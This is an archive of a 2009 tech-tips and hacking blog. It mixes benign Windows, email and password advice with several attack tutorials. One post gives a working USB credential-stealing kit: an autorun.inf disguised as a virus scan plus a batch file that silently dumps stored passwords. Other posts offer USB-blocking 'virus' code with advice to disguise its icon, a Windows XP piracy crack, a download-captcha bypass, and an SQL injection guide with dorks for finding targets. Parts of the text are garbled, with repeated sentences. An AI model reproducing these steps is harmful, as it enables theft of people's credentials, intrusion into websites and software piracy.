Your Ad Here

Thursday, November 26, 2009

Changing boot logo in Windows 7

In Windows Vista, there was the possibility of an alternative splash screen to switch instead of the normal load bar that is displayed by Windows Vista. In Windows 7 boot screen is not available but may be the Windows logo that is displayed when launching Windows 7 be completely eliminated. In Windows 7 boot screen is not available but may be the Windows logo that is displayed when launching Windows 7 be completely eliminated. Once you choose to disable the logo is only a black screen. Once you choose to disable the logo is only a black screen.

Go to Start, click All Programs and then Accessories and select Run here. Then type msconfig and click OK. Then type msconfig and click OK. In the window that opens click on the tab "Start computer. In the window that opens click on the tab "Start computer. Click here for the tick in" Without UI to launch ", if you can show jusit information at startup, check also" Information about startup operating system to. Turn here for the tick in "Without UI to launch", if you can show jusit information at startup, check also "Information about operating system to startup.

Then press OK, the reboot as requested here is not necessary. The next time the computer starts the Windows logo will not appear. The next time the computer starts the Windows logo will not appear.

How to generate the passwords

Many users often have to be a simple password that is used also in several places such as the computer itself, Live Messenger and Google. It is always advisable in that regard for the safety for a strong password and set up a different password for each service so when your password may be overtaken by someone else not have direct access to all services that you use. It is always advisable in that regard for the safety for a strong password and set up a different password for each service so when your password may be over taken by someone else not have direct access to all services that you use.

Weak passwords
Examples of weak passwords include 12345678, qwerty, zxcvbn, asdfgh, ABCDEFG and other words with a clear sense of order as the names of parents, children / grandchildren, birth dates, etc. Examples of weak administrator passwords include 12345678, qwerty, zxcvbn , asdfgh, ABCDEFG and other words with a clear sense of order as the names of parents, children / grand children, birth dates, administrator etc.

Strong Passwords Strong passwords
Strong passwords have an outsider has no meaning and are difficult to guess. Strong passwords have no meaning for an outsider and they are harder to guess. The password easier to remember you can combine as names and birth dates. The password easier to remember you can combine as names and birth dates. Imagine you have a date of birth 14/02/1975 and pet named Kyra example you can make of it: # 12Kyra75. Imagine you have a date of birth 14/02/1975 and pet named Kyra example you can make of it: # 12Kyra75.

Key issues in creating and using a password:

1.The longer the better, try to keep at least 8 characters.
2.Use uppercase and lowercase letters and combine it with numbers and any special characters such as points and fences.
3.Change your password periodically, eg every 3 months.
4.Try a different password for each service used.
5.Keep an alternate email address is set to recover passwords.
6.Do not use the "Ask" option. You can often choose a question in this one password in order to recover your password. You can often choose a question in this one password in order to recover your password.
7.Note Phishing Mails.
8.Be careful when using other computers. If possible use in this case the private mode of the browser, almost all modern browsers have this as InPrivate Internet Explorer and Chrome Incognito mode. If possible use in this case the private mode of the browser, almost all modern browsers have this as InPrivate Internet Explorer and Chrome Incognito mode.
9.Important not to write passwords, nor store them in a text file. Want to save the passwords do pay attention that you do not file as "ABC.doc" where possible and protect the file so you must first enter a password for the document to open. Want to save the passwords do pay attention that you do not file as "ABC.doc" where possible and protect the file so you must first enter a password for the document to open.
10.Not to tell passwords to others.
11.May not save passwords in the browser, especially on other computers.

Make Slideshow as desktop background in Windows 7

There are several programs that allow you a slideshow as a desktop background set as the Webshots program, but may since Windows 7 Windows yourself. To own a slideshow set to click anywhere on the desktop, right-click "Personalize". To own a slideshow set to click anywhere on the desktop, right-click "Personalize". In the window that opens you see a list of topics, click here below and then click Desktop Background list opens with the wallpaper. In the window that opens you see a list of topics, click here below and then click Desktop Background list opens with the wallpaper.

Top of the window then a Browse button so a folder to select their own images instead of the default Windows wallpaper. Top of the window then a Browse button so a folder to select their own images instead of the default Windows wallpaper.

You can search the list by Determining Whether the picture should be included in the slideshow. To set this up go with the mouse over a thumbnail and click the checkbox to select a photo to be included in the slideshow. To set this up go with the mouse over a thumbnail and click the checkbox to select a photo to be included in the slideshow. Use the 'Select All' button at the top select all pictures at once. Use the 'Select All' button at the top select all pictures at once. The slideshow is automatically activated when multiple images are selected. The slideshow is automatically activated when multiple images are selected.

At the bottom you have the options for the slideshow itself. Under "Change picture every:" you determine the time after which a picture has to be changed. Under "Change picture every:" you determining the time after which a picture has to be changed. You need the ability to choose between 10 seconds up to one days. You need the ability to choose between 10 seconds up to one days. Next door is an option called "Random". Next door is an option called "Random". This pictures are displayed randomly and not in the default order in the list. This pictures are displayed randomly and not in the default order in the list.

For laptop users there is now an extra option available. By default the slideshow will be disabled when the laptop only uses the battery. By default the slideshow will be disabled when the laptop only uses the battery. Remove the tick if this road to the slideshow even then available. Remove the tick if this road to the slideshow here then available.

If the slideshow is enabled you can quickly change a photo by right clicking on the desktop and selecting "Next background. If the slideshow is enabled you can quickly change a photo by right clicking on the desktop and selecting "Next background.

Thursday, November 19, 2009

How to Sniff Passwords Using USB Drive

As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to sniff passwords from any computer. We need the following tools to create our rootkit.

MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0

Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…

PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.

Here is a step by step procedure to create the password hacking toolkit.

NOTE: You must temporarily disable your antivirus before following these steps.

1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.

ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan


save the Notepad and rename it from

New Text Document.txt to autorun.inf

Now copy the autorun.inf file onto your USB pendrive.

3. Create another Notepad and write the following text onto it.

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt


save the Notepad and rename it from

New Text Document.txt to launch.bat

Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on on any computer to sniff the stored passwords. Just follow these steps

1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).

2. In the pop-up window, select the first option (Perform a Virus Scan).

3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.

4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.

This hack works on Windows 2000, XP and Vista

NOTE: This procedure will only recover the stored passwords (if any) on the Computer.

How to Protect an Email Account from SPAM

Most of us get SPAM every day. Some of us get more and some little. Even a newly created email account will begin to receive spam just after a few days of it’s creation. Many times we wonder where these spam come from and why? But this question remains unanswered within ourselves. So in this post I will try my best to give every possible information about the spam and will also tell you about how to combat spam.

What is SPAM?

Spam is the abuse of electronic messaging systems (including most broadcast media, digital delivery systems) to send unsolicited bulk messages indiscriminately. Most widely recognized form of spam is email spam.

Where do these SPAM come from?

These spam come only from spammers and never from a legitimate user or a company. These spammers send a single email to hundreds (some times thousands or millions) of email addresses at a time. They either send it manually or use spambots to automate the process of spamming.

Why do spammers SPAM?

The main goal of spammers is to send the spam (unsolicited bulk messages) to as many people as possible in order to make profit. For example, John builds a small website to sell an ebook which gives information about weight loss. In order to make sales he needs publicity for his website. Instead of spending money on advertising, John decides to create an email which contains information about his site along with it’s link and send this email to say 100 email addresses in his contact list. If 1 person out of hundred buy this book john gets $10. What if he sends this email to 1000s of email addresses. He gets $100. Imagine, if he sends this email to 1 Million email addresses he gets $100000.

Now I hope you understood the idea behind spamming. So in order to make money, spammers send their advertising emails to as many people as possible without respecting the recipient’s privacy.

From where do SPAMmers get my email address?

On the Internet there exists many sites who collect the email IDs of people and sell them to spammers in bulk. Most often, people sign up for monthly newsletters and take up surveys. This is the time where these scam sites get their email addresses. Also many spammers collect email addresses by using spambots. These spambots collect email addresses from the Internet in order to build mailing lists. Such spambots are web crawlers that can gather email addresses from Web sites, newsgroups, forums, special-interest group (SIG) postings, and chat-room conversations.

Spammers also use the trick of creating Hoax Emails for gathering a huge list of email IDs. For example, a spammer sends a hoax email which says “Forward this Message to Help Severely Burned Child”. This email claims that 11 cents will be donated to the child’s family every time the message is sent to others. Most of the people believe this and start forwarding this hoax email to all of the IDs in their contact list. In this way the email spreads rapidly and eventually when it reaches the creator (spammer), the spammer gets a huge list of valid email addresses in the email header. When you get these kind of hoax emails, you can see for yourself in the email header which contains a huge list of email addresses of all those people to whom the email is being forwarded to. This is one of the effective methods used by spammers to gather email addresses.

Is SPAMming legal?

Spamming is completely illegal. Yet it is really difficult to stop spammers from spamming since they keep moving from one hosting company to another after getting banned. This makes it practically impossible to catch spammers and prosecute them.

How to protect my email account from getting SPAMmed?

The following methods can be used to combat email spam.

1. Use spam filters for your email account. If you’re using email services like Gmail, Yahoo, Hotmail etc. then spam filters are used by defaut. Each spam filter has it’s algorithm to detect spam emails and will automatically move them to SPAM folder. This keeps your inbox free from spam. However some spam emails become successful to make their way into the inbox by successfully bypassing the filters.

2. Do not post your email address in public forums, user comments and chat-rooms. Give your email address only to trustworthy websites while signing up for newsletters.

3. While taking up online surveys and filling up feedback forms, it is better not to give your personal email address. Instead singup for a dummy email account and use this for surveys and feedback forms.

4. While posting your contact email address on your website use this format: emailaddress [at] yoursite.com instead of emailaddress@yoursite.com. This protects your email address from being indexed by spambots.

5. Do not respond to hoax messages. When you receive a hoax email, avoid forwarding it to your friends. Examples of hoax messages can be found at www.hoax-slayer.com. If you really want to forward it to your friends, make sure that you use “Bcc” (blind certified copy) option to send the email. This will hide all the email IDs to which the mail is forwarded to.

Use Gmail Account to Send Emails from Multiple Addresses

In this post you can learn how to use your Gmail account to send and receive emails from multiple addresses. Most of us own more than one email account say for example, one from Gmail, one from Yahoo and one from Hotmail. If you are tired of logging into multiple accounts to check your inbox or to send emails, I have a solution here.

Gmail has an option to integrate multiple email accounts (email addresses) into a single Gmail account. Once you integrate multiple email addresses into your Gmail account, you can use the same account to send emails from different addresses and receive emails for different addresses. Let’s take a simple example

Suppose you have three email addresses (email accounts)

1. hacking@gmail.com

2. hacking@yahoo.com

3. hacker@hotmail.com

You can integrate the emails hacking@yahoo.com and hacker@hotmail.com to hacking@gmail.com and operate all the three accounts from your single gmail account. Here is a step-by-step procedure to do this.

1. Login to your gmail account.

2. Click on Settings at the top right corner.

3. Under Settings, click on Accounts tab.

4. Now you’ll see the first option “Send mail as:“

5. Under this option, click on Add another email address you own

6. Now a small new window will pop-up asking you to enter the details of your new email address.

7. Here you can enter any name and any email address. The email address need not belong to gmail only. You can enter your yahoo, hotmail or any other valid email address.

8. A Verification email will be sent to the address that you specify. Once you verify that you own the email address, it will be integrated to your Gmail account.

Now when you compose a new email, you’ll see an option to select from multiple address to send the mail. Also you’ll receive the incoming mails for multiple addresses to a single mailbox. I hope this will benefit you.

Before you leave, note this, according to Gmail privacy policy, they will not send the user’s IP address in the outgoing emails. That means when you send an email from your Gmail account , the receiver will not be able to find out your IP address. But you don’t have this advantage in Yahoo or other email providers.

A Virus Program to Disable USB Ports

This post will show you how to create a simple virus that disables/blocks the USB ports on the computer (PC). As usual use C programming language to create this virus. Anyone with a basic knowledge of C language should be able to understand the working of this virus program.

Once this virus is executed it will immediately disable all the USB ports on the computer. As a result the you’ll will not be able to use your pen drive or any other USB peripheral on the computer. The source code for this virus is available for download. You can test this virus on your own computer without any worries since I have also given a program to re-enable all the USB ports.

1. Download the USB_Block.rar file on to your computer.

2. It contains the following 4 files.

* block_usb.c (source code)
* unblock_usb.c (source code)

3. You need to compile them before you can run it. A step-by-step procedure to compile C programs is given in previous post - How to Compile C Programs.

3. Upon compilation of block_usb.c you get block_usb.exe which is a simple virus that will block (disable) all the USB ports on the computer upon execution (double click).

4. To test this virus, just run the block_usb.exe file and insert a USB pen drive (thumb drive). Now you can see that your pen drive will never get detected. To re-enable the USB ports just run the unblock_usb.exe (you need to compile unblock_usb.c) file. Now insert the pen drive and it should get detected.

5. You can also change the icon of this file to make it look like a legitimate program. For more details on this refer the previous post – How to Change the ICON of an EXE file (This step is also optional).

How to Change the ICON of an EXE file

Some times it becomes necessary to change the ICON of an executable(.exe) file so that the exe file get’s a new appearence.Many of the Tools such as TuneUP Winstyler does this job by adjusting the Windows to display a custom icon to the user.But in reality when the file is carried to a different computer, then it shows it’s original ICON itself.This means that inorder to permanantly change the ICON, it is necessary to modify the executable file and embed the ICON inside the file itself.Now when this is done the exe file’s ICON is changed permanantly so that even if you take file to a different computer it show’s a new icon.

For this purpose here is a nice tool which modifies the exe file and will embed the ICON of your choice into the file itself. ie:The tool changes the exe ICON permanantly.

I’ll give you a step-by-step instruction on how to use this tool to change the icon.

1. Goto Shelllabs.com and download the trial version of Icon Changer and install it (Works on both XP and Vista).

2. Right-click on the exe file whose ICON is to be changed.

3. Now you will see the option Change Icon…Click on that option.

4. Now the Icon Changer program will open up.

5. Icon changer will search for all the ICONS on your system so that you can select any one of those.

6. Now select the ICON of your choice and click on SET.

7. Now a popup window will appear and ask you to select from either of these two options.

* Change embeded icon.
* Adjust Windows to display custom icon.

Select the first option (Change embeded icon).

8. You are done.The ICON get’s changed.

How to Compile C Programs

If you’re new to C programming and find it difficult to compile the C source codes then this post is for you. Here is a step-by-step procedure to install Borland C++ compiler 5.5 and compile C programs.
How to install Borland C++ compiler

1. Download Borland C++ compiler 5.5 (for Windows platform) from the following link.

Click Here >> CodeGear

2. After you download, run freecommandlinetools.exe. The default installation path would be

C:\Borland\BCC55
How to configure Borland C++ compiler

1. After you install Borland C++ compier, create two new Text Documents

2. Open the first New Text Document.txt file and add the following two lines into it

-I”c:\Borland\Bcc55\include”

-L”c:\Borland\Bcc55\lib”

Save changes and close the file. Now rename the file from New Text Document.txt to bcc32.cfg.

3. Open the second New Text Document (2).txt file and add the following line into it

-L”c:\Borland\Bcc55\lib”

Save changes and close the file. Now rename the file from New Text Document (2).txt to ilink32.cfg.

4. Now copy the two files bcc32.cfg and ilink32.cfg, navigate to C:\Borland\BCC55\Bin and paste them.
How to compile the C source code (.C files)

1. You need to place the .C (example.c) file to be compiled in the following location

C:\Borland\BCC55\Bin

2. Now goto command prompt (Start->Run->type cmd->Enter)

3. Make the following path as the present working directory (use CD command)

C:\Borland\BCC55\Bin

4. To compile the file (example.c) use the following command

bcc32 example.c

5. Now if there exists no error in the source code you’ll get an executable file (example.exe) in the same location (C:\Borland\BCC55\Bin).

6. Now you have successfully compiled the source code into an executable file(.exe file).

NOTE: The above tutorial assumes that you’ve installed the compiler onto the C: drive (by default).

Thursday, November 12, 2009

Make Windows Xp Genuine Forever

The most popular way? to make your Os genuine is to hunt up Genuine Operating system Product keys.

Note:Genuine keys can only be used once.If they are used on different computers having same Operating system they become non-genuine.

Note:All the steps below are to be followed using Internet explorer otherwise they wont work.

Step 1: Confirm your windows XP is Genuine or not ? by Clicking on the link below:
Go to Microsoft.com to validate

Step 2: On the right hand side you will find two options named “Validate Windows” and “Validate Office” Click on validate windows.

Step 3: You will find a pop up which will state”Did you notice the information Bar”Just tick mark the don’t show this message again box and click on Ok.

Step 4: On the top of your browser you will see the information bar where you will find the following text written”This site might require following ActiveX control…….”Click on the information bar and then click on install ActiveX control.

Step 5: Another pop up box will appear asking you whether you want to install this software.Click on Install.

Step 7:Now it will tell you that you are a victim of software counterfeit,this means that your copy is pirated.If it doesn’t then your windows copy is already genuine.

1 simple step to make it genuine.

Download this file from rapidshare.It makes minute changes in the registry so that your windows xp becomes genuine.

Here is the Link: Download the Registry File

Run the file. It will ask you for a confirmation regarding whether you want to run it or not.Click on yes.

Now try all as told to you i.e about how to validate your XP. After validating it will surely not tell you that your copy of XP is pirated. It’s will work and make it Genuine for you.

Try installing Wmp 11,Ie 7 or 8…..trying updating your XP !!! It's gonna work...

You have now got a Genuine xp.

Monday, November 9, 2009

India Toll Free Numbers / Customer Care Numbers List

I received this as an email forward, did not verify the numbers. I am not responsible for any errors in the list!

Airways
Indian Airlines – 1800 180 1407
Jet Airways – 1800 22 5522
SpiceJet – 1800 180 3333

Automobiles
Mahindra Scorpio – 1800 22 6006
Maruti – 1800 111 515
Tata Motors – 1800 22 5552
Windshield Experts – 1800 11 3636

Banks
ABN AMRO – 1800 11 2224
Axis Bank – 1860 425 8888
Canara Bank – 1800 44 6000
Citibank – 1800 44 2265
Corporatin Bank – 1800 443 555
Development Credit Bank – 1800 22 5769
HDFC Bank – 1800 227 227
ICICI Bank – 1800 333 499
ICICI Bank NRI – 1800 22 4848
IDBI Bank – 1800 11 6999
Indian Bank – 1800 425 1400
ING Vysya – 1800 44 9900
Kotak Mahindra Bank – 1800 22 6022
Lord Krishna Bank – 1800 11 2300
Punjab National Bank – 1800 122 222
State Bank of India – 1800 44 1955
Syndicate Bank – 1800 44 6655

Cell Phones
BenQ – 1800 22 08 08
Bird CellPhones – 1800 11 7700
Motorola MotoAssist – 1800 11 1211
Nokia – 3030 3838
Samsung – 1800110011
Sony Ericsson – 3901 1111

Computers/IT
Adrenalin – 1800 444 445
AMD – 1800 425 6664
Apple Computers – 1800 444 683
Canon – 1800 333 366
Cisco Systems – 1800 221 777
Compaq – HP – 1800 444 999
Data One Broadband – 1800 424 1800
Dell – 1800 425 9046
Epson – 1800 44 0011
eSys – 3970 0011
Genesis Tally Academy – 1800 444 888
HCL – 1800 180 8080
IBM – 1800 443 333
Lexmark – 1800 22 4477
Marshal’s Point – 1800 33 4488
Microsoft – 1800 111 100
Microsoft Virus Update – 1901 333 334

Seagate – 1800 180 1104
Symantec – 1800 44 5533
TVS Electronics – 1800 444 566
WeP Peripherals – 1800 44 6446
Wipro – 1800 333 312
xerox – 1800 180 1225
Zenith – 1800 222 004

Couriers/Packers & Movers
ABT Courier – 1800 44 8585
AFL Wizz – 1800 22 9696
Agarwal Packers & Movers – 1800 11 4321
Associated Packers P Ltd – 1800 21 4560
DHL – 1800 111 345
FedEx – 1800 22 6161
Goel Packers & Movers – 1800 11 3456
UPS – 1800 22 7171

Education
Edu Plus – 1800 444 000
Hindustan College – 1800 33 4438
NCERT – 1800 11 1265
Vellore Institute of Technology – 1800 441 555

Healthcare
Best on Health – 1800 11 8899
Dr Batras – 1800 11 6767
GlaxoSmithKline – 1800 22 8797
Johnson & Johnson – 1800 22 8111
Kaya Skin Clinic – 1800 22 5292
LifeCell – 1800 44 5323

Manmar Technologies – 1800 33 4420
Pfizer – 1800 442 442
Roche Accu-Chek – 1800 11 45 46
Rudraksha – 1800 21 4708
Varilux Lenses – 1800 44 8383
VLCC – 1800 33 1262

Home Appliances
Aiwa/Sony – 1800 11 1188
Anchor Switches – 1800 22 7979
Blue Star – 1800 22 2200
Bose Audio – 1800 11 2673
Bru Coffee Vending Machines – 1800 44 7171
Daikin Air Conditioners – 1800 444 222
DishTV – 1800 12 3474
Faber Chimneys – 1800 21 4595
Godrej – 1800 22 5511
Grundfos Pumps – 1800 33 4555

LG – 1901 180 9999
Philips – 1800 22 4422
Samsung – 1800 113 444
Sanyo – 1800 11 0101
Voltas – 1800 33 4546
WorldSpace Satellite Radio – 1800 44 5432

Hotel Reservations
GRT Grand – 1800 44 5500
InterContinental Hotels Group – 1800 111 000
Marriott – 1800 22 0044
Sarovar Park Plaza – 1800 111 222
Taj Holidays – 1800 111 825

Insurance
AMP Sanmar – 1800 44 2200
Aviva – 1800 33 2244
Bajaj Allianz – 1800 22 5858
Chola MS General Insurance – 1800 44 5544
HDFC Standard Life – 1800 227 227
LIC – 1800 33 4433
Max New York Life – 1800 33 5577
Royal Sundaram – 1800 33 8899
SBI Life Insurance – 1800 22 9090

Mattresses
Kurl-on – 1800 44 0404
Sleepwell – 1800 11 2266

Investments/Finance
CAMS – 1800 44 2267
Chola Mutual Fund – 1800 22 2300
Easy IPO’s – 3030 5757
Fidelity Investments – 1800 180 8000
Franklin Templeton Fund – 1800 425 4255
J M Morgan Stanley – 1800 22 0004
Kotak Mutual Fund – 1800 222 626
LIC Housing Finance – 1800 44 0005
SBI Mutual Fund – 1800 22 3040
Sharekhan – 1800 22 7500
Tata Mutual Fund – 1800 22 0101

Paints
Asian Paints Home Solutions – 1800 22 5678
Berger Paints Home Decor – 1800 33 8800

Teleshopping
Asian Sky Shop – 1800 22 1800
Jaipan Teleshoppe – 1800 11 5225
Tele Brands – 1800 11 8000
VMI Teleshopping – 1800 447 777
WWS Teleshopping – 1800 220 777

Travel
Club Mahindra Holidays – 1800 33 4539
Cox & Kings – 1800 22 1235
God TV Tours – 1800 442 777
Kerala Tourism – 1800 444 747
Kumarakom Lake Resort – 1800 44 5030
Raj Travels & Tours – 1800 22 9900
Sita Tours – 1800 111 911
SOTC Tours – 1800 22 3344

UPS
APC – 1800 44 4272
Numeric – 1800 44 3266

Others
Consumer Helpline – 1800 11 4000
L’Or?al, GARNIeR – 1800 223 000
KONE Elevator – 1800 444 666
Indane – 1800 44 51 15
Aavin – 1800 44 3300
Pedigree – 1800 11 2121
Kodak India – 1800 22 8877
Domino’s Pizza – 1800 111 123
World Vision India – 1800 444 550
Telecom Monitoring Cell – 1800 110 420

Did these numbers work for you? Let me know in comments page. BTW, updated the numbers from 1600* to 1800*

Megaupload Trick - download without countdown or captchas

If you want to download from Megaupload without captchas or countdown timers, here is a trick worth trying out. It helps to convert megaupload links into direct download links.
Megaupload Direct Download Link Generator

If you are having a download link from megaupload like

http://www.megaupload.com/?d=GVOMXHQ2

then convert it to

http://www.megaupload.com/mgr_dl.php?d=GVOMXHQ2

That is, just replace “/?” of the original download URL with "/mgr_dl.php?" just after the ".com/"

You can place this direct link in download managers for immediate downloads from megaupload.

No Coundown

No Captchas

Maximum Speed

Google Account Password Recovery via SMS

It’s easy to forget, and now its easy to remind also. Google has now enabled password recovery through SMS service, which make sure that only you can access your account. So if you forget your password, you can reset it using a recovery code which Google send in a text message to your mobile phone.

According to Google, following mobile carriers supports account recovery via SMS in India.

* Aircel Cellular Limited
* Bharat Sanchar Nigam Limited
* Bharti Airtel Limited
* BPL Mobile Communications Limited
* IDEA Cellular Limited
* Reliance Telecom Limited
* Spice Communications Limited
* Vodafone

But, currently this feature is enabled for Google users in the United States only. It is expected to have this feature enabled very soon for other countries that support the SMS services, including India.

To set up password recovery via your mobile phone, just sign in to your account and click Change Password Recovery Options. Select your country if listed in the drop down, enter your mobile phone number and current password and then click Save. If you lose access to your account for any reason, you’ll be able to regain access by entering a code Google send in a text message.

To send yourself a recovery code via SMS, enter your username on the password-assistance page. After completing the word verification, you’ll receive confirmation that Google has sent a code to your phone. Keep this page open so you can get to the page where you enter your code. Check your phone for a text message from Google. Enter your recovery code and click Submit recovery code. Type your new password. And now your new password is in effect.

Sunday, November 8, 2009

How to get rid of Captcha on Orkut – When Posting an image

As we know orkut does not allow us to post images to anyone but our friends .Even if we post an image to our friend we have to go through the annoying captcha (captcha is a spam remover technique in which you have to type the distorted words from an image) .Captcha really gets on our nerve when we are posting image Greetings on New year or Christmas .Well these problems are of course not very awesome .Considering Orkut is one of the leading Social networking sites in the world .

Well on to the image business .Orkut does not display image on any community threads or non friend scraps. And there is an idea to get pass this .There are “non animated really not cool” Smileys in orkut which will appear when we type [:D] ,[:X],[:)] and so on .But most of the Orkut users are not satisfied with this .

The first thing the orkut checks when we input an image link is , That the link is a honest one or not .The honest links are those links which are provided from google services.For example if we add an embed code from myspace videos to a community thread , nothing will happen but when it comes to youtube the video will pop up because the youtube is a google service.So we need to find image hosting service of google (images from blogger ie. the links starts with 4.bp.blog…. is not a honest link – I don’t know why!).

Google’s Picture hosting site is http://picasaweb.google.com .Anything we upload on Picasa will appear on your friend’s scrap book with out asking you for Captcha .And it will appear on any community or a non friend’s Scrapbook with captcha . So if you see a nice looking Image on any site (it has to be a picture file like .gif .jpg .png .bmp etc “|.swf won’t do“)

Do the following

1. Login to Picasa with your google account -create an account if you don’t have one already .note: if you have a blog you can see your uploaded pictures to blogger there! .
2. Download your favorite smiley set on to yourcomputer .
3. Click upload on picasa select a album or create one .
4. Upload the Smiley to picasa .
5. Click the album which contains your Image.
6. Click on smiley.
7. After its completely loaded Right click on it ->Copy link location (or address).
8. Now post it on your friends Scrapbook ….. See no captcha!!!!

You can also upload your New year wishes picture on it and use some Scarp all software to send the greetings to all of your friends.

Google adsense for your wordpress theme (Part 1)

In this tutorial you are going to learn how to tweak your wordpress theme and place google adsense ads or ads from any other network in your wordpress blog.

Best positions to place ads:

If you have a three column template the best positions for adsense ads would be a 160*600 banner in the sidebar , a 160*90 linked unit above the 160*600 banner and large rectangle or 468* 60 ad unit just after the title of your post and at the end of your post.

If you have a 2 column template the best positions are a square linked unit in the side bar and a large rectangle or 468*60 ad unit just after the title of your post and at the end of your post. If your theme is wide enough to accommodate a 768*90 ad then use it before and after your post.

How to choose the colours of your Google ads:

Try to match the Google ads with the content of your site. Set the title color of your ad as the title colour, text colour as the color of your content and link color as the links in your content. Have the background and border same as your theme background.

A small tip on getting the exact colour codes:

Take a screen shot of your blog (Use print screen key on your keyboard) and open photo shop, select new press ctr+v and then use the color picker to get the exact colour codes



Let’s go on with the actual part:

First decide how many types (linked unit, large rectangle, lead board etc) of ads you want to display.

For Example if you decide to place the following ad units in your wordpress blog

· Horizontal linked ad unit

· 468*60 ad unit and

· 460*60 referral unit

Open notepad, paste the adsense code for horizontal linked unit in note pad and save it as horilinked.inc

Note: Don’t forget to select all types when saving the file in windows.

Repeat the above step for all the ad units and upload those files to wp-content>themes>XXXX

(In case your theme name is XXXX)

Removing Autorun.inf without any tool

This post shows you that how to remove the residing autorun.inf file even you cleared all the viruses in your pendrive or local drives. This file makes the drives not when we try to open it or when we try to rename the drive it won’t. This file is used by most of the virus authors to reside there work even after the user remove all the viruses from their computer. This file give lots of annoiences. Basically it usally used to call or run the viruses frequently. This file can also be used to work as i said above. To remove this type of files from your computer do the following steps:-

1. Click start and then run
2. Type cmd to open up the command prompt.
3. Change your directory to any on off your directory by using syntax driveletter: For example d:
4. Then type the command attrib in the prompt it display the list of executable files in the current directory.
5. Check whether autorun.inf file is present or not.
6. If not then you are lucky.
7. If present then you have to follow all the following steps to remove that file.
8. First you have to remove the power it is having for ex read only attribute etc…
9. The attribute depends on viruses.
10. One common step to remove all its properties is type the following command in the command prompt:- attrib -s -h -r autorun.inf
11. -s to remove its system attribute, -h to remove its hidden attribute and -r to remove the read only attribute.
12. You can use this steps to remove any of the files which has this properties.
13. Remember before doing the above steps you have to remove all the viruses form your computer. I recommend avast home edition which is free and 100% perfect. If you haven’t clean the viruses first clean it because after you delete this file it will automatically creates it without your knowledge.
14. Then type the following command:- del autorun.inf.
15. Now you have successfully deleted the file after you deleted the file restart your computer or remove your pendrive and plug it again.

In this way you can remove that file.

SQL Injection : Ultimate method for Website Hacking.

SQL Injection basically means to execute a query in the database which is connected to the website to get personal information out of it, which is not visible to a normal user. Database is most likely to be a part of the websites, which saves all the information like user names, passwords, posts, replies in it. So there is a possibility that you might put some commands or queries or requests whatever you want to call it into the database to get some hidden information out of it.

It is noticed that in the past SQL Injection have been used several times to steal the credit card information, E-mail address and passwords, because most of the users have same E-mail address and passwords into all of their E-mail accounts. So if you manage to hack one of the accounts, you may just get access to all of their accounts. SQL Injection is most likely used by the “Penetration Testers” to check if the website of their clients are vulnerable to some kind of attacks to steal the information. Here, in this article I will show you how do they do it. There are some simple terms expected out of you and one of them is that you understand the basic knowledge of the computer. This tutorial will let you know, how to start? where to stop? what to do?

1. How to check if the website is vulnerable to SQL Injection?
A: On most of the website i read people saying that try to add “`” at the end [without quotes], and if you get some error that means that the website is vulnerable to SQL Injection. But being an experienced guy in the penetration, i’d rather tell you that this is a TOTAL MYTH. The best way to check the site vulnerability is to add “+order+by+6753″ at the end of the URL. Because, 97% of the websites don’t have more then 6753. columns. So by adding 6753 number, you will check if it has 6753 columns, which it apperatenly doesn’t have. So it will give you an error, and if it does that means that the WEBSITE IS VULNERABLE. It is generally noticed that a website doesn’t have more than 100 columns at the most in its database. So by entering the number 6753, you are trying to make it sure if the website gives you an error with it. IF it does that means you can proceed further. To check an SQL Injection, its mandatory that the website should be pointing it self to some specific page, i.e. “website.com/index.php?page=11″. So in this case the website is pointing it self to page Number.11 to pull up some specific information. So, to check if the website is vulnerable or not, you can try with the following URL. i.e. “website.com/index.php?page=11+order+by+6753″.

2. How would i find the vulnerable websites?
A.: Google is the best friend of Hackers, when I say this don’t assume that i am just writing it because i am supposed it. I really mean it. There is something called as “google dorks”, which are basically a command which could be put into the Google search to find out specific groups of pages.
here are some Google dorks which you may try to find out the vulnerable websites.
a. inurl:index.php?page=
b. inurl:members.php?member=
c. inurl:index.php?id=
d. inurl:articles.php?page=

This will help you to find out the websites which are connected and working with SQL Databases at the backend. Some of them might be vulnerable to SQL Injection. So you can try to put “order+by+6753″ at the end of the URL to check if its vulnerable.

Display Legal Notice on Startup of your Windows

